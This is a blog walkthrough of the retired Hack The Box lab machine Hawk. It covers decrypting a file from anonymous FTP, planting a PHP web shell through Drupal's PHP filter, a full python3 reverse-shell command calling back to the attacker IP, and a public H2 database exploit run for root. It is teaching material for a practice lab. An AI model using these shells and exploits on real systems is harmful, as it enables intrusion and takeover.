Those Are The Guys!

Two guys who do stuff on twitch: /thosearetheguys

View on GitHub
2 December 2018

Htb Hawk

by Jake

This week we take a look at the retired Hack The Box machine Hawk (low-medium difficulty)

Our live stream of this box can be found on our youtube channel

We start off with an nmap scan

root@kali: nmap -sC -sV -oN nmap 10.10.10.102
# Nmap 7.70 scan initiated Fri Sep 21 19:58:27 2018 as: nmap -sC -sV -oN nmap 10.10.10.102
Nmap scan report for 10.10.10.102
Host is up (0.35s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 ftp      ftp          4096 Jun 16 22:21 messages
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.15
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e4:0c:cb:c5:a5:91:78:ea:54:96:af:4d:03:e4:fc:88 (RSA)
|   256 95:cb:f8:c7:35:5e:af:a9:44:8b:17:59:4d:db:5a:df (ECDSA)
|_  256 4a:0b:2e:f7:1d:99:bc:c7:d3:0b:91:53:b9:3b:e2:79 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome to 192.168.56.103 | 192.168.56.103
8082/tcp open  http    H2 database http console
|_http-title: H2 Console
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 21 19:58:53 2018 -- 1 IP address (1 host up) scanned in 26.84 seconds

We can see that we have a Drupal website running as well as an FTP server with anonymous access.

Starting with the website, looks like a standard empty Drupal site.

Before we check out the FTP, we always want some form of enumeration going in the background. So lets enumerate Drupal with droopescan.

root@kali: droopescan scan drupal -u 10.10.10.102

While that runs lets check out the othe rweb server on port 8080 to see if we also need to run some enumeration against that:

219971608.png

We can see that remote connections are blocked, looks like something we need to keep in mind for later on in the process.

Moving on to the FTP.

root@kali: ftp 10.10.10.102
Connected to 10.10.10.102.
220 (vsFTPd 3.0.3)
Name (10.10.10.102:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jun 16 22:21 messages
226 Directory send OK.
ftp> cd messages
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> dir -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jun 16 22:21 .
drwxr-xr-x    3 ftp      ftp          4096 Jun 16 22:14 ..
-rw-r--r--    1 ftp      ftp           240 Jun 16 22:21 .drupal.txt.enc
226 Directory send OK.
ftp> get .drupal.txt.enc
local: .drupal.txt.enc remote: .drupal.txt.enc
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .drupal.txt.enc (240 bytes).
226 Transfer complete.
240 bytes received in 0.00 secs (1.3230 MB/s)
ftp> 

We start off by listing the current directory and see that there is a messages folder, going into that folder our initial look shows that the folder is empty, but for good measure we run dir -a to list any potentially hidden files and get a result. Finally we download the .drupal.txt.enc file so that we can take a look at it locally.

Looking back at the droopescan results we don’t see anything interesting:

root@kali: droopescan scan drupal -u 10.10.10.102
[+] Themes found:                                                               
    seven http://10.10.10.102/themes/seven/
    garland http://10.10.10.102/themes/garland/

[+] Possible interesting urls found:
    Default changelog file - http://10.10.10.102/CHANGELOG.txt
    Default admin - http://10.10.10.102/user/login

[+] Possible version(s):
    7.58

[+] Plugins found:
    image http://10.10.10.102/modules/image/
    profile http://10.10.10.102/modules/profile/
    php http://10.10.10.102/modules/php/

[+] Scan finished (0:04:43.477241 elapsed)

So lets focus on the .drupal.txt.enc file. Looking at the contents it looks suspiciously like base64, in fact, a file against it even tells us:

Hawk-1.png

Decoding it we can see what looks more like a salted openssl encrypted content:

Hawk-2.png

While we were able to find tools out there that could do the job in multiple stages, we wrote our own script to perform a dictionary attack against an openssl encrypted file and save the plain text output. The script can be found on our github: decrypt-openssl-bruteforce

The script includes multiple options we run through on stream, but the the script will work on both the original base64 encoded file as well as the one we manually decoded:

root@kali: python decrypt-openssl-bruteforce.py -i .drupal.txt.enc -w /usr/share/wordlists/rockyou.txt -o drupal.txt -s -b64
Key Found! The key is:friends
Output File Name : drupal.txt

In this case we are using the arguments -s because our encrypted file is salted and -b64 because we are running the decryption against the raw Base64 encoded file from the FTP site. to run it against the one we decoded ourselves we could also use the command:

root@kali: python decrypt-openssl-bruteforce.py -i drupal.txt.enc -w /usr/share/wordlists/rockyou.txt -o drupal.txt -s

Looking at the contents of the plain text file:

root@kali: cat drupal.txt
Daniel,

Following the password for the portal:

PencilKeyboardScanner123

Please let us know when the portal is ready.

Kind Regards,

IT department

Nice! We found some Drupal credentials, time to log in. Browse to the site and enter the credentials admin:PencilKeyboardScanner123

219840514.png

Looking around the administrator section we can see that there is nothing particularly interesting going on, and no juicy data to get us any further. We are going to have to get in ourselves.

Like most CMS systems Drupal includes modules to allow direct PHP code execution for those more advanced CMS admins. We can use that to our advantage to get command execution against the server:

Under the Modules menu item, scroll down and check the box for PHP filter then scroll all the way to the bottom and click save configuration

219971591.png

Once we have done that we can re-use a very common PHP command execution one liner and embed it on any page:

<pre><?php system($_REQUEST['cmd']) ?></pre>

From the top menu click Structure then Blocks

219906058.png

Click the Add blocks button and give it a name, the php script, change the Text format to PHP code and place it on any of the page template regions:

220069901.png

Once done, scroll to the bottom and click Save block

Now we can browse to the site and add the query string ?cmd= to any page and the page contents will display the output of our command. We wrapped the PHP code in <pre> tags so that the shell output formatting is preserved including new lines.

220200973.png

Before we go any further, a shell is always easier to use. Testing a few basic things we can see that Python3 is installed with ?cmd=which python3

Referring to our favourite reverse shell cheat sheet we find a working python3 reverse shell. Start of by setting up a listener nc -nlvp 1234

Then in the browser navigate to:

http://10.10.10.102/?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Replace the Attacker IP and Port with your own and you should get a reverse shell callback.

As always we upgrade the shell with

python3 -c 'import pty; pty.spawn("/bin/bash")'

Once we have a shell we can look at the current users with:

www-data@hawk: cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
tomcat:x:1001:46::/opt/tomat/temp:/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
daniel:x:1002:1005::/home/daniel:/usr/bin/python3
ftp:x:112:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
Debian-snmp:x:113:116::/var/lib/snmp:/bin/false

Looks like we have a daniel user with a home directory but only has a login shell of /usr/bin/python3 This is something out of the orgdinary so lets check out that home directory

www-data@hawk: ls -la /home/daniel
total 36
drwxr-xr-x 5 daniel daniel 4096 Jul  1 13:22 .
drwxr-xr-x 3 root   root   4096 Jun 16 22:32 ..
lrwxrwxrwx 1 daniel daniel    9 Jul  1 13:22 .bash_history -> /dev/null
drwx------ 2 daniel daniel 4096 Jun 12 09:51 .cache
drwx------ 3 daniel daniel 4096 Jun 12 09:51 .gnupg
-rw------- 1 daniel daniel  136 Jun 12 09:43 .lesshst
-rw------- 1 daniel daniel  342 Jun 12 09:43 .lhistory
drwx------ 2 daniel daniel 4096 Jun 12 09:40 .links2
lrwxrwxrwx 1 daniel daniel    9 Jul  1 13:22 .python_history -> /dev/null
-rw------- 1 daniel daniel  814 Jun 12 09:30 .viminfo
-rw-r--r-- 1 daniel daniel   33 Jun 16 22:30 user.txt

Looking at the file permissions our user should be able to read the user.txt flag:

www-data@hawk: cat /home/daniel/user.txt
d5111d4f75370[REDACTED]

There was nothing else interesting in the home directory so priv esc must be somewhere else.

Time to look at running processes and listening ports:

www-data@hawk: ps -auxw
USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root          1  0.0  0.9 159628  8968 ?        Ss   03:30   0:05 /sbin/init maybe-ubiquity
root          2  0.0  0.0      0     0 ?        S    03:30   0:00 [kthreadd]
root          4  0.0  0.0      0     0 ?        I<   03:30   0:00 [kworker/0:0H]
root          6  0.0  0.0      0     0 ?        I<   03:30   0:00 [mm_percpu_wq]
root          7  0.0  0.0      0     0 ?        S    03:30   0:00 [ksoftirqd/0]
root          8  0.0  0.0      0     0 ?        I    03:30   0:05 [rcu_sched]
root          9  0.0  0.0      0     0 ?        I    03:30   0:00 [rcu_bh]
root         10  0.0  0.0      0     0 ?        S    03:30   0:00 [migration/0]
root         11  0.0  0.0      0     0 ?        S    03:30   0:00 [watchdog/0]
root         12  0.0  0.0      0     0 ?        S    03:30   0:00 [cpuhp/0]
root         13  0.0  0.0      0     0 ?        S    03:30   0:00 [kdevtmpfs]
root         14  0.0  0.0      0     0 ?        I<   03:30   0:00 [netns]
root         15  0.0  0.0      0     0 ?        S    03:30   0:00 [rcu_tasks_kthre]
root         16  0.0  0.0      0     0 ?        S    03:30   0:00 [kauditd]
root         17  0.0  0.0      0     0 ?        S    03:30   0:00 [khungtaskd]
root         18  0.0  0.0      0     0 ?        S    03:30   0:00 [oom_reaper]
root         19  0.0  0.0      0     0 ?        I<   03:30   0:00 [writeback]
root         20  0.0  0.0      0     0 ?        S    03:30   0:00 [kcompactd0]
root         21  0.0  0.0      0     0 ?        SN   03:30   0:00 [ksmd]
root         22  0.0  0.0      0     0 ?        SN   03:30   0:01 [khugepaged]
root         23  0.0  0.0      0     0 ?        I<   03:30   0:00 [crypto]
root         24  0.0  0.0      0     0 ?        I<   03:30   0:00 [kintegrityd]
root         25  0.0  0.0      0     0 ?        I<   03:30   0:00 [kblockd]
root         26  0.0  0.0      0     0 ?        I<   03:30   0:00 [ata_sff]
root         27  0.0  0.0      0     0 ?        I<   03:30   0:00 [md]
root         28  0.0  0.0      0     0 ?        I<   03:30   0:00 [edac-poller]
root         29  0.0  0.0      0     0 ?        I<   03:30   0:00 [devfreq_wq]
root         30  0.0  0.0      0     0 ?        I<   03:30   0:00 [watchdogd]
root         32  0.0  0.0      0     0 ?        I    03:30   0:07 [kworker/0:1]
root         34  0.0  0.0      0     0 ?        S    03:30   0:00 [kswapd0]
root         35  0.0  0.0      0     0 ?        S    03:30   0:00 [ecryptfs-kthrea]
root         77  0.0  0.0      0     0 ?        I<   03:30   0:00 [kthrotld]
root         78  0.0  0.0      0     0 ?        I<   03:30   0:00 [acpi_thermal_pm]
root         79  0.0  0.0      0     0 ?        S    03:30   0:00 [scsi_eh_0]
root         80  0.0  0.0      0     0 ?        I<   03:30   0:00 [scsi_tmf_0]
root         81  0.0  0.0      0     0 ?        S    03:30   0:00 [scsi_eh_1]
root         82  0.0  0.0      0     0 ?        I<   03:30   0:00 [scsi_tmf_1]
root         88  0.0  0.0      0     0 ?        I<   03:30   0:00 [ipv6_addrconf]
root         97  0.0  0.0      0     0 ?        I<   03:30   0:00 [kstrp]
root        114  0.0  0.0      0     0 ?        I<   03:30   0:00 [charger_manager]
root        169  0.0  0.0      0     0 ?        I<   03:30   0:00 [mpt_poll_0]
root        170  0.0  0.0      0     0 ?        I<   03:30   0:00 [mpt/0]
root        209  0.0  0.0      0     0 ?        S    03:30   0:00 [scsi_eh_2]
root        210  0.0  0.0      0     0 ?        I<   03:30   0:00 [scsi_tmf_2]
root        211  0.0  0.0      0     0 ?        I<   03:30   0:00 [ttm_swap]
root        212  0.0  0.0      0     0 ?        S    03:30   0:00 [irq/16-vmwgfx]
root        214  0.0  0.0      0     0 ?        I<   03:30   0:00 [kworker/0:1H]
root        283  0.0  0.0      0     0 ?        I<   03:30   0:00 [raid5wq]
root        334  0.0  0.0      0     0 ?        S    03:30   0:01 [jbd2/sda2-8]
root        335  0.0  0.0      0     0 ?        I<   03:30   0:00 [ext4-rsv-conver]
root        408  0.0  1.1 117648 10956 ?        Ss   03:30   0:43 /usr/bin/vmtoolsd
root        410  0.0  0.0      0     0 ?        I<   03:30   0:00 [iscsi_eh]
root        412  0.0  1.5  94824 15712 ?        S<s  03:30   0:00 /lib/systemd/systemd-journald
root        414  0.0  0.0      0     0 ?        I<   03:30   0:00 [ib-comp-wq]
root        415  0.0  0.0      0     0 ?        I<   03:30   0:00 [ib_mcast]
root        416  0.0  0.0      0     0 ?        I<   03:30   0:00 [ib_nl_sa_wq]
root        417  0.0  0.0      0     0 ?        I<   03:30   0:00 [rdma_cm]
root        420  0.0  0.1  97708  1880 ?        Ss   03:30   0:00 /sbin/lvmetad -f
root        426  0.0  0.5  46864  5716 ?        Ss   03:30   0:00 /lib/systemd/systemd-udevd
root        443  0.0  0.0      0     0 ?        S<   03:30   0:00 [loop0]
root        446  0.0  0.0      0     0 ?        S<   03:30   0:00 [loop1]
root        458  0.0  0.0      0     0 ?        S<   03:30   0:00 [loop2]
systemd+    572  0.0  0.3 141908  3204 ?        Ssl  03:30   0:05 /lib/systemd/systemd-timesyncd
root        650  0.0  0.0      0     0 ?        I    03:30   0:39 [kworker/0:3]
systemd+    669  0.0  0.5  71816  5244 ?        Ss   03:30   0:00 /lib/systemd/systemd-networkd
systemd+    720  0.0  0.5  70608  5260 ?        Ss   03:30   0:04 /lib/systemd/systemd-resolved
root        785  0.0  0.7 288536  7100 ?        Ssl  03:30   0:01 /usr/lib/accountsservice/accounts-daemon
root        786  0.0  1.7 169132 17088 ?        Ssl  03:30   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher
root        798  0.0  0.5  61996  5412 ?        Ss   03:30   0:00 /lib/systemd/systemd-logind
daemon      804  0.0  0.2  28332  2400 ?        Ss   03:30   0:00 /usr/sbin/atd -f
message+    807  0.0  0.4  50052  4572 ?        Ss   03:30   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidf
root        809  0.0  0.3  30028  3188 ?        Ss   03:30   0:00 /usr/sbin/cron -f
root        810  0.0  1.0  87760  9960 ?        Ss   03:30   0:00 /usr/bin/VGAuthService
syslog      811  0.0  0.4 267272  4716 ?        Ssl  03:30   0:00 /usr/sbin/rsyslogd -n
root        812  0.0  0.3  57500  3196 ?        S    03:30   0:00 /usr/sbin/CRON -f
root        820  0.0  0.0   4628   772 ?        Ss   03:30   0:00 /bin/sh -c /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar
root        821  0.0  5.5 2340564 54228 ?       Sl   03:30   0:55 /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar
Debian-+    823  0.0  1.1  63960 11376 ?        Ss   03:30   0:28 /usr/sbin/snmpd -Lsd -Lf /dev/null -u Debian-snmp -g Debian-snmp -
root        824  0.0  0.2  28676  2820 ?        Ss   03:30   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root        826  0.0  0.6  72296  6384 ?        Ss   03:30   0:00 /usr/sbin/sshd -D
root        827  0.0  0.0  25376   228 ?        Ss   03:30   0:01 /sbin/iscsid
root        828  0.0  0.5  25880  5260 ?        S<Ls 03:30   0:00 /sbin/iscsid
mysql       859  0.0 20.9 1157220 206516 ?      Sl   03:30   0:33 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
root        882  0.0  0.2  14888  1976 tty1     Ss+  03:30   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root        883  0.0  0.6 288868  6660 ?        Ssl  03:30   0:00 /usr/lib/policykit-1/polkitd --no-debug
root        887  0.0  2.9 326820 29524 ?        Ss   03:30   0:02 /usr/sbin/apache2 -k start
www-data   1899  0.0  2.7 330132 27488 ?        S    06:25   0:00 /usr/sbin/apache2 -k start
www-data   1900  0.0  2.9 332180 29088 ?        S    06:25   0:00 /usr/sbin/apache2 -k start
www-data   1901  0.0  2.5 330124 25008 ?        S    06:25   0:00 /usr/sbin/apache2 -k start
www-data   1903  0.0  3.1 332660 30864 ?        S    06:25   0:00 /usr/sbin/apache2 -k start
www-data  18694  0.0  2.8 332188 27824 ?        S    20:44   0:00 /usr/sbin/apache2 -k start
www-data  18695  0.0  2.8 332180 27636 ?        S    20:44   0:00 /usr/sbin/apache2 -k start
www-data  18697  0.0  2.5 330132 25320 ?        S    20:44   0:00 /usr/sbin/apache2 -k start
www-data  18700  0.0  2.5 330132 25612 ?        S    20:49   0:00 /usr/sbin/apache2 -k start
www-data  18701  0.0  2.8 332188 27964 ?        S    20:50   0:00 /usr/sbin/apache2 -k start
www-data  18707  0.0  2.5 330132 25244 ?        S    20:58   0:00 /usr/sbin/apache2 -k start
root      18811  0.0  0.0      0     0 ?        I    21:25   0:00 [kworker/u256:2]
root      18816  0.0  0.0      0     0 ?        I    21:30   0:00 [kworker/u256:0]
www-data  18818  0.0  0.0   4628   784 ?        S    21:32   0:00 sh -c python3 -c 'import socket,subprocess,os;s=socket.socket(sock
www-data  18819  0.0  1.0  36464 10468 ?        S    21:32   0:00 python3 -c import socket,subprocess,os;s=socket.socket(socket.AF_I
www-data  18820  0.0  0.0   4628   868 ?        S    21:32   0:00 /bin/sh -i
www-data  18821  0.0  0.9  37340  9228 ?        S    21:35   0:00 python3 -c import pty; pty.spawn("/bin/bash")
www-data  18822  0.0  0.3  18508  3336 pts/0    Ss   21:35   0:00 /bin/bash
root      18829  0.0  0.0      0     0 ?        I    21:35   0:00 [kworker/u256:1]
www-data  18923  0.0  0.3  36700  3160 pts/0    R+   21:42   0:00 ps -auxw

www-data@hawk: netstat -an | grep LISTEN
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp6       0      0 :::9092                 :::*                    LISTEN     
tcp6       0      0 :::80                   :::*                    LISTEN     
tcp6       0      0 :::8082                 :::*                    LISTEN     
tcp6       0      0 :::21                   :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 :::5435                 :::*                    LISTEN     
unix  2      [ ACC ]     SEQPACKET  LISTENING     15716    /run/udev/control
unix  2      [ ACC ]     STREAM     LISTENING     15377    /run/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     15387    /run/systemd/journal/stdout
unix  2      [ ACC ]     STREAM     LISTENING     15393    /run/lvm/lvmetad.socket
unix  2      [ ACC ]     STREAM     LISTENING     15639    /run/lvm/lvmpolld.socket
unix  2      [ ACC ]     STREAM     LISTENING     19326    /var/run/dbus/system_bus_socket
unix  2      [ ACC ]     STREAM     LISTENING     19338    /run/uuidd/request
unix  2      [ ACC ]     STREAM     LISTENING     19340    /run/acpid.socket
unix  2      [ ACC ]     STREAM     LISTENING     20877    /var/run/vmware/guestServicePipe
unix  2      [ ACC ]     STREAM     LISTENING     22349    /var/agentx/master
unix  2      [ ACC ]     STREAM     LISTENING     23082    /var/run/mysqld/mysqld.sock
unix  2      [ ACC ]     STREAM     LISTENING     21197    @ISCSIADM_ABSTRACT_NAMESPACE

Comparing the outputs with our initial nmap and our attempts at the :8082 port we can see that h2-1.4.196.jar is running as root and is most likely what is listening on port 8082

Use searchsploit to see if this version has any known vulnerabilities:

root@kali: searchsploit H2
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                               |  Path
                                                                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Adobe Flash - H264 File Stack Corruption                                                                                     | exploits/multiple/dos/39466.txt
Adobe Flash - H264 Parsing Out-of-Bounds Read                                                                                | exploits/multiple/dos/39464.txt
Buffalo WZR-HP-G300NH2 - Cross-Site Request Forgery                                                                          | exploits/hardware/webapps/26129.txt
Google Android - 'ih264d_process_intra_mb' Memory Corruption                                                                 | exploits/android/dos/39651.txt
H2 Database - 'Alias' Arbitrary Code Execution                                                                               | exploits/java/local/44422.py
H2 Database 1.4.196 - Remote Code Execution                                                                                  | exploits/java/webapps/45506.py
H2 Database 1.4.197 - Information Disclosure                                                                                 | exploits/linux/webapps/45105.py
H264WebCam - Boundary Condition Error                                                                                        | exploits/windows/dos/13920.c
H2O-CMS 3.4 - Insecure Cookie Handling                                                                                       | exploits/php/webapps/6862.txt
H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass                                                              | exploits/php/webapps/32540.pl
H2O-CMS 3.4 - Remote Command Execution                                                                                       | exploits/php/webapps/6861.pl
Heathco Software h2desk - Multiple Information Disclosure Vulnerabilities                                                    | exploits/php/webapps/31321.txt
NETGEAR SPH200D - Multiple Vulnerabilities                                                                                   | exploits/hardware/webapps/24441.txt
Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart' Local Privilege Escalation                                                 | exploits/solaris/local/20276.sh
Netscape iCal 2.1 Patch2 - iPlanet iCal 'iplncal.sh' Permissions                                                             | exploits/solaris/local/20275.sh
SSH2 3.0 - Restricted Shell Escape (Command Execution)                                                                       | exploits/linux/local/21398.txt
SSH2 3.0 - Short Password Login                                                                                              | exploits/unix/remote/21021.pl
WebRTC - H264 NAL Packet Processing Type Confusion                                                                           | exploits/multiple/dos/45123.txt
freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Remote Denial of Service                                                                   | exploits/linux/dos/31218.txt
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Shellcode Title                                                                                                             |  Path
                                                                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Windows/x64 - Bind (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)                                              | shellcodes/windows_x86-64/40981.c
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Papers: No Result

We have a code execution vulnerability with an exact match for our version. use the -m flag to mirror the script to our current working directory:

root@kali: searchsploit -m exploits/java/webapps/45506.py

Now its time to take a look at the exploit and see how to use it and if it requires any changes for our environment:

root@kali: python3 45506.py                            
usage: 45506.py [-h] -H 127.0.0.1:8082 [-d jdbc:h2:~/emptydb-lPB71]
45506.py: error: the following arguments are required: -H/--host

We can see from the example output that it works with python3 and that it can be run against localhost (127.0.0.1) with the -H argument.

Using our friend SimpleHTTPServer it is easy to transfer the file to the server and execute it:

root@kali: python -m SimpleHTTPServer

www-data@hawk: wget 10.10.14.2:8000/45506.py -O /tmp/45506.py
www-data@hawk: python3 /tmp/45506.py -H 127.0.0.1:8082
python3 45506.py -H 127.0.0.1:8082
[*] Attempting to create database
[+] Created database and logged in
[*] Sending stage 1
[+] Shell succeeded - ^c or quit to exit
h2-shell$ whoami
whoami
root
h2-shell$

The exploit worked and we have a root shel!.

We are currently in a h2-shell but have full command execution against the server as the root user and can read the root.txt

h2-shell$ cat /root/root.txt
cat /root/root.txt
54f3e840fe556[REDACTED]
tags: